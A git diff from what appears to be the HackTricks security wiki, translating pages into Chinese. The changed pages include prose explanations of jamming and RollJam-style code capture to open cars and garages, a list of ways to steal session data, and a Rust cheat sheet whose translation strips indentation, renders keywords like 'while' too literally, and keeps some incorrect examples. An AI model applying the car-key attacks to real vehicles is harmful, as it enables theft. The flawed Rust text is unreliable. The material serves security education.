@@ -39,43 +39,43 @@ flipper-zero/fz-sub-ghz.md
 
 ## Rolling Codes Protection
 
-Automatic garage door openers typically use a wireless remote control to open and close the garage door. The remote control **sends a radio frequency (RF) signal** to the garage door opener, which activates the motor to open or close the door.
+自动车库门开启器通常使用无线遥控器来打开和关闭车库门。遥控器**发送无线电频率（RF）信号**到车库门开启器，激活电机以打开或关闭门。
 
-It is possible for someone to use a device known as a code grabber to intercept the RF signal and record it for later use. This is known as a **replay attack**. To prevent this type of attack, many modern garage door openers use a more secure encryption method known as a **rolling code** system.
+有人可以使用称为代码抓取器的设备来拦截RF信号并记录以备后用。这被称为**重放攻击**。为了防止这种攻击，许多现代车库门开启器使用一种更安全的加密方法，称为**滚动代码**系统。
 
-The **RF signal is typically transmitted using a rolling code**, which means that the code changes with each use. This makes it **difficult** for someone to **intercept** the signal and **use** it to gain **unauthorised** access to the garage.
+**RF信号通常使用滚动代码传输**，这意味着每次使用时代码都会变化。这使得**拦截**信号并**利用**它获得**未授权**访问车库变得**困难**。
 
-In a rolling code system, the remote control and the garage door opener have a **shared algorithm** that **generates a new code** every time the remote is used. The garage door opener will only respond to the **correct code**, making it much more difficult for someone to gain unauthorised access to the garage just by capturing a code.
+在滚动代码系统中，遥控器和车库门开启器有一个**共享算法**，每次使用遥控器时**生成一个新代码**。车库门开启器只会对**正确代码**做出响应，这使得仅通过捕获代码就获得未授权访问车库变得更加困难。
 
 ### **Missing Link Attack**
 
-Basically, you listen for the button and **capture the signal whilst the remote is out of range** of the device (say the car or garage). You then move to the device and **use the captured code to open it**.
+基本上，你监听按钮并**在遥控器超出设备范围时捕获信号**（比如汽车或车库）。然后你移动到设备并**使用捕获的代码打开它**。
 
 ### Full Link Jamming Attack
 
-An attacker could **jam the signal near the vehicle or receive**r so the **receiver cannot actually ‘hear’ the code**, and once that is happening you can simply **capture and replay** the code when you have stopped jamming.
+攻击者可以**在车辆或接收器附近干扰信号**，使得**接收器无法真正“听到”代码**，一旦发生这种情况，你可以简单地**捕获并重放**代码，当你停止干扰时。
 
-The victim at some point will use the **keys to lock the car**, but then the attack will have **recorded enough "close door" codes** that hopefully could be resent to open the door (a **change of frequency might be needed** as there are cars that use the same codes to open and close but listens for both commands in different frequencies).
+受害者在某个时刻会使用**钥匙锁定汽车**，但攻击者将**记录足够的“关门”代码**，希望能够重新发送以打开门（可能需要**更改频率**，因为有些汽车使用相同的代码来打开和关闭，但在不同频率下监听两个命令）。
 
 > [!WARNING]
-> **Jamming works**, but it's noticeable as if the **person locking the car simply tests the doors** to ensure they are locked they would notice the car unlocked. Additionally if they were aware of such attacks they could even listen to the fact that the doors never made the lock **sound** or the cars **lights** never flashed when they pressed the ‘lock’ button.
+> **干扰有效**，但很明显，如果**锁车的人只是测试车门**以确保它们被锁上，他们会注意到汽车未锁。此外，如果他们意识到这种攻击，他们甚至可以听到车门在按下“锁定”按钮时从未发出锁定**声音**或汽车**灯光**在按下时从未闪烁。
 
 ### **Code Grabbing Attack ( aka ‘RollJam’ )**
 
-This is a more **stealth Jamming technique**. The attacker will jam the signal, so when the victim tries to lock the door it won't work, but the attacker will **record this code**. Then, the victim will **try to lock the car again** pressing the button and the car will **record this second code**.\
-Instantly after this the **attacker can send the first code** and the **car will lock** (victim will think the second press closed it). Then, the attacker will be able to **send the second stolen code to open** the car (supposing that a **"close car" code can also be used to open it**). A change of frequency might be needed (as there are cars that use the same codes to open and close but listens for both commands in different frequencies).
+这是一种更**隐蔽的干扰技术**。攻击者将干扰信号，因此当受害者尝试锁门时将无法工作，但攻击者会**记录此代码**。然后，受害者将**再次尝试锁定汽车**，按下按钮，汽车将**记录第二个代码**。\
+紧接着，**攻击者可以发送第一个代码**，汽车将**锁定**（受害者会认为第二次按下锁定了）。然后，攻击者将能够**发送第二个被盗代码以打开**汽车（假设**“关车”代码也可以用于打开它**）。可能需要更改频率（因为有些汽车使用相同的代码来打开和关闭，但在不同频率下监听两个命令）。
 
-The attacker can **jam the car receiver and not his receiver** because if the car receiver is listening in for example a 1MHz broadband, the attacker won't **jam** the exact frequency used by the remote but **a close one in that spectrum** while the **attackers receiver will be listening in a smaller range** where he can listen the remote signal **without the jam signal**.
+攻击者可以**干扰汽车接收器而不是他的接收器**，因为如果汽车接收器在例如1MHz宽带中监听，攻击者不会**干扰**遥控器使用的确切频率，而是**在该频谱中的一个接近频率**，而**攻击者的接收器将监听一个更小的范围**，在没有干扰信号的情况下监听遥控器信号。
 
 > [!WARNING]
-> Other implementations seen in specifications show that the **rolling code is a portion** of the total code sent. Ie the code sent is a **24 bit key** where the first **12 are the rolling code**, the **second 8 are the command** (such as lock or unlock) and the last 4 is the **checksum**. Vehicles implementing this type are also naturally susceptible as the attacker merely needs to replace the rolling code segment to be able to **use any rolling code on both frequencies**.
+> 其他实施方案在规格中显示，**滚动代码是发送的总代码的一部分**。即发送的代码是一个**24位密钥**，其中前**12位是滚动代码**，**第二个8位是命令**（如锁定或解锁），最后4位是**校验和**。实施这种类型的车辆也自然容易受到攻击，因为攻击者只需替换滚动代码段即可在两个频率上**使用任何滚动代码**。
 
 > [!CAUTION]
-> Note that if the victim sends a third code while the attacker is sending the first one, the first and second code will be invalidated.
+> 请注意，如果受害者在攻击者发送第一个代码时发送第三个代码，则第一个和第二个代码将失效。
 
 ### Alarm Sounding Jamming Attack
 
-Testing against an aftermarket rolling code system installed on a car, **sending the same code twice** immediately **activated the alarm** and immobiliser providing a unique **denial of service** opportunity. Ironically the means of **disabling the alarm** and immobiliser was to **press** the **remote**, providing an attacker with the ability to **continually perform DoS attack**. Or mix this attack with the **previous one to obtain more codes** as the victim would like to stop the attack asap.
+在对安装在汽车上的后市场滚动代码系统进行测试时，**立即发送相同的代码两次**会**激活警报**和防盗装置，提供了一个独特的**拒绝服务**机会。具有讽刺意味的是，**禁用警报**和防盗装置的方法是**按下**遥控器，这使得攻击者能够**持续执行DoS攻击**。或者将此攻击与**前一个攻击结合以获取更多代码**，因为受害者希望尽快停止攻击。
 
 ## References
 
@@ -85,4 +85,3 @@ Testing against an aftermarket rolling code system installed on a car, **sending
 - [https://hackaday.io/project/164566-how-to-hack-a-car/details](https://hackaday.io/project/164566-how-to-hack-a-car/details)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/references.md b/src/todo/references.md
index cbb355a3a..9e5dd6281 100644
--- a/src/todo/references.md
+++ b/src/todo/references.md
@@ -47,4 +47,3 @@
 {% embed url="https://ippsec.rocks/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md
index 4a276273b..cdec8f62e 100644
--- a/src/todo/rust-basics.md
+++ b/src/todo/rust-basics.md
@@ -1,68 +1,61 @@
 # Rust Basics
 
-### Generic Types
-
-Create a struct where 1 of their values could be any type
+### 泛型类型
 
+创建一个结构体，其中一个值可以是任何类型
 ```rust
 struct Wrapper<T> {
-    value: T,
+value: T,
 }
 
 impl<T> Wrapper<T> {
-    pub fn new(value: T) -> Self {
-        Wrapper { value }
-    }
+pub fn new(value: T) -> Self {
+Wrapper { value }
+}
 }
 
 Wrapper::new(42).value
 Wrapper::new("Foo").value, "Foo"
 ```
-
 ### Option, Some & None
 
-The Option type means that the value might by of type Some (there is something) or None:
-
+Option 类型意味着值可能是 Some 类型（有某些东西）或 None：
 ```rust
 pub enum Option<T> {
-    None,
-    Some(T),
+None,
+Some(T),
 }
 ```
+您可以使用 `is_some()` 或 `is_none()` 等函数来检查 Option 的值。
 
-You can use functions such as `is_some()` or `is_none()` to check the value of the Option.
-
-### Macros
-
-Macros are more powerful than functions because they expand to produce more code than the code you’ve written manually. For example, a function signature must declare the number and type of parameters the function has. Macros, on the other hand, can take a variable number of parameters: we can call `println!("hello")` with one argument or `println!("hello {}", name)` with two arguments. Also, macros are expanded before the compiler interprets the meaning of the code, so a macro can, for example, implement a trait on a given type. A function can’t, because it gets called at runtime and a trait needs to be implemented at compile time.
+### 宏
 
+宏比函数更强大，因为它们扩展以生成比您手动编写的代码更多的代码。例如，函数签名必须声明函数的参数数量和类型。另一方面，宏可以接受可变数量的参数：我们可以用一个参数调用 `println!("hello")`，或用两个参数调用 `println!("hello {}", name)`。此外，宏在编译器解释代码含义之前被扩展，因此宏可以在给定类型上实现一个 trait。例如，函数不能这样做，因为它在运行时被调用，而 trait 需要在编译时实现。
 ```rust
 macro_rules! my_macro {
-    () => {
-        println!("Check out my macro!");
-    };
-    ($val:expr) => {
-        println!("Look at this other macro: {}", $val);
-    }
+() => {
+println!("Check out my macro!");
+};
+($val:expr) => {
+println!("Look at this other macro: {}", $val);
+}
 }
 fn main() {
-    my_macro!();
-    my_macro!(7777);
+my_macro!();
+my_macro!(7777);
 }
 
 // Export a macro from a module
 mod macros {
-    #[macro_export]
-    macro_rules! my_macro {
-        () => {
-            println!("Check out my macro!");
-        };
-    }
+#[macro_export]
+macro_rules! my_macro {
+() => {
+println!("Check out my macro!");
+};
+}
 }
 ```
-
-### Iterate
-
+### 迭代
 ```rust
 // Iterate through a vector
 let my_fav_fruits = vec!["banana", "raspberry"];
@@ -70,7 +63,7 @@ let mut my_iterable_fav_fruits = my_fav_fruits.iter();
 assert_eq!(my_iterable_fav_fruits.next(), Some(&"banana"));
 assert_eq!(my_iterable_fav_fruits.next(), Some(&"raspberry"));
 assert_eq!(my_iterable_fav_fruits.next(), None); // When it's over, it's none
- 
+
 // One line iteration with action
 my_fav_fruits.iter().map(|x| capitalize_first(x)).collect()
 
@@ -79,113 +72,101 @@ for (key, hashvalue) in &*map {
 for key in map.keys() {
 for value in map.values() {
 ```
-
-### Recursive Box
-
+### 递归盒子
 ```rust
 enum List {
-    Cons(i32, List),
-    Nil,
+Cons(i32, List),
+Nil,
 }
 
 let list = Cons(1, Cons(2, Cons(3, Nil)));
 ```
+### 条件语句
 
-### Conditionals
-
-#### if
-
+#### 如果
 ```rust
 let n = 5;
 if n < 0 {
-    print!("{} is negative", n);
+print!("{} is negative", n);
 } else if n > 0 {
-    print!("{} is positive", n);
+print!("{} is positive", n);
 } else {
-    print!("{} is zero", n);
+print!("{} is zero", n);
 }
 ```
-
-#### match
-
+#### 匹配
 ```rust
 match number {
-    // Match a single value
-    1 => println!("One!"),
-    // Match several values
-    2 | 3 | 5 | 7 | 11 => println!("This is a prime"),
-    // TODO ^ Try adding 13 to the list of prime values
-    // Match an inclusive range
-    13..=19 => println!("A teen"),
-    // Handle the rest of cases
-    _ => println!("Ain't special"),
+// Match a single value
+1 => println!("One!"),
+// Match several values
+2 | 3 | 5 | 7 | 11 => println!("This is a prime"),
+// TODO ^ Try adding 13 to the list of prime values
+// Match an inclusive range
+13..=19 => println!("A teen"),
+// Handle the rest of cases
+_ => println!("Ain't special"),
 }
 
 let boolean = true;
 // Match is an expression too
 let binary = match boolean {
-    // The arms of a match must cover all the possible values
-    false => 0,
-    true => 1,
-    // TODO ^ Try commenting out one of these arms
+// The arms of a match must cover all the possible values
+false => 0,
+true => 1,
+// TODO ^ Try commenting out one of these arms
 };
 ```
-
-#### loop (infinite)
-
+#### 循环（无限）
 ```rust
 loop {
-    count += 1;
-    if count == 3 {
-        println!("three");
-        continue;
-    }
-    println!("{}", count);
-    if count == 5 {
-        println!("OK, that's enough");
-        break;
-    }
+count += 1;
+if count == 3 {
+println!("three");
+continue;
+}
+println!("{}", count);
+if count == 5 {
+println!("OK, that's enough");
+break;
+}
 }
 ```
-
-#### while
-
+#### 当
 ```rust
 let mut n = 1;
 while n < 101 {
-    if n % 15 == 0 {
-        println!("fizzbuzz");
-    } else if n % 5 == 0 {
-        println!("buzz");
-    } else {
-        println!("{}", n);
-    }
-    n += 1;
+if n % 15 == 0 {
+println!("fizzbuzz");
+} else if n % 5 == 0 {
+println!("buzz");
+} else {
+println!("{}", n);
+}
+n += 1;
 }
 ```
-
-#### for
-
+#### 为
 ```rust
 for n in 1..101 {
-    if n % 15 == 0 {
-        println!("fizzbuzz");
-    } else {
-        println!("{}", n);
-    }
+if n % 15 == 0 {
+println!("fizzbuzz");
+} else {
+println!("{}", n);
+}
 }
 
 // Use "..=" to make inclusive both ends
 for n in 1..=100 {
-    if n % 15 == 0 {
-        println!("fizzbuzz");
-    } else if n % 3 == 0 {
-        println!("fizz");
-    } else if n % 5 == 0 {
-        println!("buzz");
-    } else {
-        println!("{}", n);
-    }
+if n % 15 == 0 {
+println!("fizzbuzz");
+} else if n % 3 == 0 {
+println!("fizz");
+} else if n % 5 == 0 {
+println!("buzz");
+} else {
+println!("{}", n);
+}
 }
 
 // ITERATIONS
@@ -193,128 +174,115 @@ for n in 1..=100 {
 let names = vec!["Bob", "Frank", "Ferris"];
 //iter - Doesn't consume the collection
 for name in names.iter() {
-    match name {
-        &"Ferris" => println!("There is a rustacean among us!"),
-        _ => println!("Hello {}", name),
-    }
+match name {
+&"Ferris" => println!("There is a rustacean among us!"),
+_ => println!("Hello {}", name),
+}
 }
 //into_iter - COnsumes the collection
 for name in names.into_iter() {
-    match name {
-        "Ferris" => println!("There is a rustacean among us!"),
-        _ => println!("Hello {}", name),
-    }
+match name {
+"Ferris" => println!("There is a rustacean among us!"),
+_ => println!("Hello {}", name),
+}
 }
 //iter_mut - This mutably borrows each element of the collection
 for name in names.iter_mut() {
-    *name = match name {
-        &mut "Ferris" => "There is a rustacean among us!",
-        _ => "Hello",
-    }
+*name = match name {
+&mut "Ferris" => "There is a rustacean among us!",
+_ => "Hello",
+}
 }
 ```
-
-#### if let
-
+#### 如果让
 ```rust
 let optional_word = Some(String::from("rustlings"));
 if let word = optional_word {
-    println!("The word is: {}", word);
+println!("The word is: {}", word);
 } else {
-    println!("The optional word doesn't contain anything");
+println!("The optional word doesn't contain anything");
 }
 ```
-
 #### while let
-
 ```rust
 let mut optional = Some(0);
 // This reads: "while `let` destructures `optional` into
 // `Some(i)`, evaluate the block (`{}`). Else `break`.
 while let Some(i) = optional {
-    if i > 9 {
-        println!("Greater than 9, quit!");
-        optional = None;
-    } else {
-        println!("`i` is `{:?}`. Try again.", i);
-        optional = Some(i + 1);
-    }
-    // ^ Less rightward drift and doesn't require
-    // explicitly handling the failing case.
+if i > 9 {
+println!("Greater than 9, quit!");
+optional = None;
+} else {
+println!("`i` is `{:?}`. Try again.", i);
+optional = Some(i + 1);
+}
+// ^ Less rightward drift and doesn't require
+// explicitly handling the failing case.
 }
 ```
+### 特性
 
-### Traits
-
-Create a new method for a type
-
+为一个类型创建一个新方法
 ```rust
 trait AppendBar {
-    fn append_bar(self) -> Self;
+fn append_bar(self) -> Self;
 }
 
 impl AppendBar for String {
-    fn append_bar(self) -> Self{
-        format!("{}Bar", self)
-    }
+fn append_bar(self) -> Self{
+format!("{}Bar", self)
+}
 }
 
 let s = String::from("Foo");
 let s = s.append_bar();
 println!("s: {}", s);
 ```
-
-### Tests
-
+### 测试
 ```rust
 #[cfg(test)]
 mod tests {
-    #[test]
-    fn you_can_assert() {
-        assert!(true);
-        assert_eq!(true, true);
-        assert_ne!(true, false);
-    }
+#[test]
+fn you_can_assert() {
+assert!(true);
+assert_eq!(true, true);
+assert_ne!(true, false);
+}
 }
 ```
-
-### Threading
+### 线程
 
 #### Arc
 
-An Arc can use Clone to create more references over the object to pass them to the threads. When the last reference pointer to a value is out of scope, the variable is dropped.
-
+Arc可以使用Clone来创建更多对对象的引用，以将它们传递给线程。当指向一个值的最后一个引用指针超出作用域时，该变量将被丢弃。
 ```rust
 use std::sync::Arc;
 let apple = Arc::new("the same apple");
 for _ in 0..10 {
-    let apple = Arc::clone(&apple);
-    thread::spawn(move || {
-        println!("{:?}", apple);
-    });
+let apple = Arc::clone(&apple);
+thread::spawn(move || {
+println!("{:?}", apple);
+});
 }
 ```
+#### 线程
 
-#### Threads
-
-In this case we will pass the thread a variable it will be able to modify
-
+在这种情况下，我们将传递一个变量给线程，它将能够修改该变量。
 ```rust
 fn main() {
-    let status = Arc::new(Mutex::new(JobStatus { jobs_completed: 0 }));
-    let status_shared = Arc::clone(&status);
-    thread::spawn(move || {
-        for _ in 0..10 {
-            thread::sleep(Duration::from_millis(250));
-            let mut status = status_shared.lock().unwrap();
-            status.jobs_completed += 1;
-        }
-    });
-    while status.lock().unwrap().jobs_completed < 10 {
-        println!("waiting... ");
-        thread::sleep(Duration::from_millis(500));
-    }
+let status = Arc::new(Mutex::new(JobStatus { jobs_completed: 0 }));
+let status_shared = Arc::clone(&status);
+thread::spawn(move || {
+for _ in 0..10 {
+thread::sleep(Duration::from_millis(250));
+let mut status = status_shared.lock().unwrap();
+status.jobs_completed += 1;
+}
+});
+while status.lock().unwrap().jobs_completed < 10 {
+println!("waiting... ");
+thread::sleep(Duration::from_millis(500));
+}
 }
 ```
 
-
diff --git a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
index a7f90758b..536938706 100644
--- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
@@ -1,14 +1,13 @@
-# Stealing Sensitive Information Disclosure from a Web
+# 从网页窃取敏感信息泄露
 
 {{#include ../banners/hacktricks-training.md}}
 
-If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.\
-Here I present you the main ways to can try to achieve it:
+如果在某个时刻你发现一个**根据你的会话向你展示敏感信息的网页**：也许它反映了 cookies，或者打印了信用卡详情或其他任何敏感信息，你可以尝试窃取它。\
+在这里，我向你展示主要的几种尝试实现这一目标的方法：
 
-- [**CORS bypass**](../pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
-- [**XSS**](../pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
-- [**Danging Markup**](../pentesting-web/dangling-markup-html-scriptless-injection/): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
-- [**Clickjaking**](../pentesting-web/clickjacking.md): If there is no protection against this attack, you may be able to trick the user into sending you the sensitive data (an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)).
+- [**CORS 绕过**](../pentesting-web/cors-bypass.md)：如果你可以绕过 CORS 头，你将能够通过对恶意页面执行 Ajax 请求来窃取信息。
+- [**XSS**](../pentesting-web/xss-cross-site-scripting/): 如果你在页面上发现 XSS 漏洞，你可能能够利用它来窃取信息。
+- [**悬挂标记**](../pentesting-web/dangling-markup-html-scriptless-injection/): 如果你无法注入 XSS 标签，你仍然可以使用其他常规 HTML 标签来窃取信息。
+- [**点击劫持**](../pentesting-web/clickjacking.md)：如果没有针对这种攻击的保护，你可能能够欺骗用户向你发送敏感数据（示例[在这里](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)）。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/test-llms.md b/src/todo/test-llms.md
index e81afde87..13c5f6595 100644
--- a/src/todo/test-llms.md
+++ b/src/todo/test-llms.md
@@ -1,52 +1,50 @@
-# Test LLMs
+# 测试 LLMs
 
-## Run & train models locally
+## 本地运行和训练模型
 
 ### [**Hugging Face Transformers**](https://github.com/huggingface/transformers)
 
-Hugging Face Transformers is one of the most popular open-source libraries for using, training, and deploying LLMs such as GPT, BERT, and many others. It offers a comprehensive ecosystem that includes pre-trained models, datasets, and seamless integration with the Hugging Face Hub for fine-tuning and deployment.
+Hugging Face Transformers 是使用、训练和部署 LLM（如 GPT、BERT 等）最流行的开源库之一。它提供了一个全面的生态系统，包括预训练模型、数据集，以及与 Hugging Face Hub 的无缝集成，以便进行微调和部署。
 
 ### [**LangChain**](https://github.com/langchain-ai/langchain)
 
-LangChain is a framework designed for building applications with LLMs. It allows developers to connect language models with external data sources, APIs, and databases. LangChain provides tools for advanced prompt engineering, managing conversation history, and integrating LLMs into complex workflows.
+LangChain 是一个旨在构建 LLM 应用程序的框架。它允许开发人员将语言模型与外部数据源、API 和数据库连接。LangChain 提供了用于高级提示工程、管理对话历史和将 LLM 集成到复杂工作流中的工具。
 
 ### [**LitGPT**](https://github.com/Lightning-AI/litgpt)
 
-LitGPT is a project developed by Lightning AI that leverages the Lightning framework to facilitate the training, fine-tuning, and deployment of GPT-based models. It integrates seamlessly with other Lightning AI tools, providing optimized workflows for handling large-scale language models with enhanced performance and scalability.
+LitGPT 是由 Lightning AI 开发的一个项目，利用 Lightning 框架来促进基于 GPT 的模型的训练、微调和部署。它与其他 Lightning AI 工具无缝集成，提供优化的工作流程，以处理大规模语言模型，增强性能和可扩展性。
 
 ### [**LitServe**](https://github.com/Lightning-AI/LitServe)
 
-**Description:**\
-LitServe is a deployment tool from Lightning AI designed for quickly and efficiently deploying AI models. It simplifies the integration of LLMs into real-time applications by providing scalable and optimized serving capabilities.
+**描述：**\
+LitServe 是 Lightning AI 的一个部署工具，旨在快速高效地部署 AI 模型。它通过提供可扩展和优化的服务能力，简化了 LLM 在实时应用中的集成。
 
 ### [**Axolotl**](https://github.com/axolotl-ai-cloud/axolotl)
 
-Axolotl is a cloud-based platform designed to streamline the deployment, scaling, and management of AI models, including LLMs. It offers features such as automated scaling, monitoring, and integration with various cloud services, making it easier to deploy models in production environments without extensive infrastructure management.
+Axolotl 是一个基于云的平台，旨在简化 AI 模型（包括 LLM）的部署、扩展和管理。它提供自动扩展、监控和与各种云服务集成等功能，使在生产环境中部署模型变得更加容易，而无需广泛的基础设施管理。
 
-## Try models online
+## 在线尝试模型
 
 ### [**Hugging Face**](https://huggingface.co/)
 
-**Hugging Face** is a leading platform and community for machine learning, particularly known for its work in natural language processing (NLP). It provides tools, libraries, and resources that make it easier to develop, share, and deploy machine learning models.\
-It offers several sections like:
+**Hugging Face** 是一个领先的机器学习平台和社区，特别以其在自然语言处理（NLP）方面的工作而闻名。它提供工具、库和资源，使开发、共享和部署机器学习模型变得更加容易。\
+它提供几个部分，如：
 
-* **Models**: A vast repository of **pre-trained machine learning models** where users can browse, download, and integrate models for various tasks like text generation, translation, image recognition, and more.
-* **Datasets:** A comprehensive **collection of datasets** used for training and evaluating models. It facilitates easy access to diverse data sources, enabling users to find and utilize data for their specific machine learning projects.
-* **Spaces:** A platform for hosting and sharing **interactive machine learning applications** and demos. It allows developers to **showcase** their models in action, create user-friendly interfaces, and collaborate with others by sharing live demos.
+* **模型**：一个庞大的 **预训练机器学习模型** 库，用户可以浏览、下载和集成用于文本生成、翻译、图像识别等各种任务的模型。
+* **数据集：** 一个全面的 **数据集集合**，用于训练和评估模型。它便于访问多样的数据源，使用户能够找到并利用特定机器学习项目所需的数据。
+* **空间：** 一个用于托管和共享 **交互式机器学习应用程序** 和演示的平台。它允许开发人员 **展示** 他们的模型在实际中的应用，创建用户友好的界面，并通过共享实时演示与他人合作。
 
 ## [**TensorFlow Hub**](https://www.tensorflow.org/hub) **&** [**Kaggle**](https://www.kaggle.com/)
 
-**TensorFlow Hub** is a comprehensive repository of reusable machine learning modules developed by Google. It focuses on facilitating the sharing and deployment of machine learning models, especially those built with TensorFlow.
+**TensorFlow Hub** 是一个由 Google 开发的可重用机器学习模块的综合库。它专注于促进机器学习模型的共享和部署，特别是那些使用 TensorFlow 构建的模型。
 
-* **Modules:** A vast collection of pre-trained models and model components where users can browse, download, and integrate modules for tasks such as image classification, text embedding, and more.
-* **Tutorials:** Step-by-step guides and examples which helps users understand how to implement and fine-tune models using TensorFlow Hub.
-* **Documentation:** Comprehensive guides and API references that assist developers in effectively utilizing the repository’s resources.
+* **模块：** 一个庞大的预训练模型和模型组件的集合，用户可以浏览、下载和集成用于图像分类、文本嵌入等任务的模块。
+* **教程：** 逐步指南和示例，帮助用户理解如何使用 TensorFlow Hub 实现和微调模型。
+* **文档：** 综合指南和 API 参考，帮助开发人员有效利用库中的资源。
 
 ## [**Replicate**](https://replicate.com/home)
 
-**Replicate** is a platform that allows developers to run machine learning models in the cloud via a simple API. It focuses on making ML models easily accessible and deployable without the need for extensive infrastructure setup.
-
-* **Models:** A repository of machine learning models contributed by the community which users can browse, try, and integrate models into their applications with minimal effort.
-* **API Access:** Simple APIs for running models the enable developers to deploy and scale models effortlessly within their own applications.
-
+**Replicate** 是一个平台，允许开发人员通过简单的 API 在云中运行机器学习模型。它专注于使 ML 模型易于访问和部署，而无需广泛的基础设施设置。
 
+* **模型：** 一个由社区贡献的机器学习模型库，用户可以浏览、尝试并将模型集成到他们的应用程序中，几乎不需要努力。
+* **API 访问：** 简单的 API 用于运行模型，使开发人员能够轻松地在自己的应用程序中部署和扩展模型。
diff --git a/src/todo/tr-069.md b/src/todo/tr-069.md
index 828848138..e2efcf98b 100644
--- a/src/todo/tr-069.md
+++ b/src/todo/tr-069.md
@@ -1,4 +1 @@
 # TR-069
-
-
-
diff --git a/src/welcome/about-the-author.md b/src/welcome/about-the-author.md
index 9c8ff5fa9..b1be2c23e 100644
--- a/src/welcome/about-the-author.md
+++ b/src/welcome/about-the-author.md
@@ -1,14 +1,13 @@
-# About the author
+# 关于作者
 
 {{#include ../banners/hacktricks-training.md}}
 
-### Hello!!
+### 你好！！
 
-First of all, it's needed to indicate that all **credits of techniques from researches from other sites belongs to the original authors** (there are references in the pages). Kudos to every research that shares knowledge to improve the security of the internet.
+首先，需要指出的是，所有**来自其他网站研究的技术的信用归原作者所有**（页面中有引用）。感谢每一个分享知识以提高互联网安全的研究。
 
-HackTricks is a educational Wiki that compiles knowledge about **cyber-security** lead by Carlos with hundreds of collaborators! It's a **huge collection of hacking tricks** that is updated by the community much as possible to keep it up to date. If you find something is missing or outdated, please, send a **Pull Request** to the [**Hacktricks Github**](https://github.com/carlospolop/hacktricks)!
+HackTricks 是一个由 Carlos 主导的教育 Wiki，汇集了关于**网络安全**的知识，拥有数百名合作者！这是一个**巨大的黑客技巧集合**，由社区尽可能地更新，以保持最新。如果您发现有缺失或过时的内容，请发送**Pull Request**到 [**Hacktricks Github**](https://github.com/carlospolop/hacktricks)！
 
-HackTricks is also a wiki were **a lot of researches also share their latest findings**, so it's a great place to keep up to date with the latest hacking techniques.
+HackTricks 也是一个许多研究人员分享他们最新发现的 Wiki，因此这是一个跟上最新黑客技术的好地方。
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index 93e608850..bb69323b7 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -1,146 +1,143 @@
-# HackTricks Values & FAQ
+# HackTricks 值与常见问题
 
 {{#include ../banners/hacktricks-training.md}}
 
-## HackTricks Values
+## HackTricks 值
 
 > [!TIP]
-> These are the **values of the HackTricks Project**:
+> 这些是 **HackTricks 项目的价值观**：
 >
-> - Give **FREE** access to **EDUCATIONAL hacking** resources to **ALL** Internet.
->   - Hacking is about learning, and learning should be as free as possible.
->   - The purpose of this book is to serve as a comprehensive **educational resource**.
-> - **STORE** awesome **hacking** techniques that the community publishes giving the **ORIGINAL** **AUTHORS** all the **credits**.
->   - **We don't want the credit from other people**, we just want to store cool tricks for everyone.
->   - We also write **our own researches** in HackTricks.
->   - In several cases we will just write **in HackTricks a summary of the important parts** of the technique and will **encourage the lector to visit the original post** for more details.
-> - **ORGANIZE** all the hacking techniques in the book so it's **MORE ACCESSIBLE**
->   - The HackTricks team has dedicated thousands of hours for free **only to organize the content** so people can **learn faster**
+> - 为 **所有** 互联网用户提供 **免费** 的 **教育黑客** 资源。
+>   - 黑客是关于学习的，而学习应该尽可能免费。
+>   - 本书的目的是作为一个全面的 **教育资源**。
+> - **存储** 社区发布的精彩 **黑客** 技术，给予 **原始** **作者** 所有的 **荣誉**。
+>   - **我们不想要其他人的荣誉**，我们只想为大家存储酷炫的技巧。
+>   - 我们还在 HackTricks 中撰写 **我们自己的研究**。
+>   - 在某些情况下，我们将仅在 HackTricks 中写 **技术重要部分的摘要**，并 **鼓励读者访问原始帖子** 以获取更多细节。
+> - **组织** 书中的所有黑客技术，使其 **更易获取**
+>   - HackTricks 团队为 **仅仅组织内容** 而免费投入了数千小时，以便人们可以 **更快学习**
 
 <figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
 
-## HackTricks faq
+## HackTricks 常见问题
 
 > [!TIP]
 >
-> - **Thank you so much for these resources, how can I thank you?**
+> - **非常感谢这些资源，我该如何感谢你们？**
 
-You can publicly thanks HackTricks teams for putting together all these resources publicly in a tweet mentioning [**@hacktricks_live**](https://twitter.com/hacktricks_live).\
-If you are specially grateful you can also [**sponsor the project here**](https://github.com/sponsors/carlospolop).\
-And don't forget to **give a star in the Github projects!** (Find the links below).
+您可以在推特上公开感谢 HackTricks 团队将所有这些资源汇集在一起，提及 [**@hacktricks_live**](https://twitter.com/hacktricks_live)。\
+如果您特别感激，您也可以 [**在这里赞助该项目**](https://github.com/sponsors/carlospolop)。\
+并且不要忘记 **在 Github 项目中给个星星！**（在下面找到链接）。
 
 > [!TIP]
 >
-> - **How can I contribute to the project?**
+> - **我该如何为该项目做贡献？**
 
-You can **share new tips and tricks with the community or fix bugs** you find in the books sending a **Pull Request** to the respective Github pages:
+您可以 **与社区分享新的技巧和窍门或修复您在书中发现的错误**，向相应的 Github 页面发送 **Pull Request**：
 
 - [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
 - [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
 
-Don't forget to **give a star in the Github projects!**
+不要忘记 **在 Github 项目中给个星星！**
 
 > [!TIP]
 >
-> - **Can I copy some content from HackTricks and put it in my blog?**
+> - **我可以复制一些 HackTricks 的内容并放在我的博客上吗？**
 
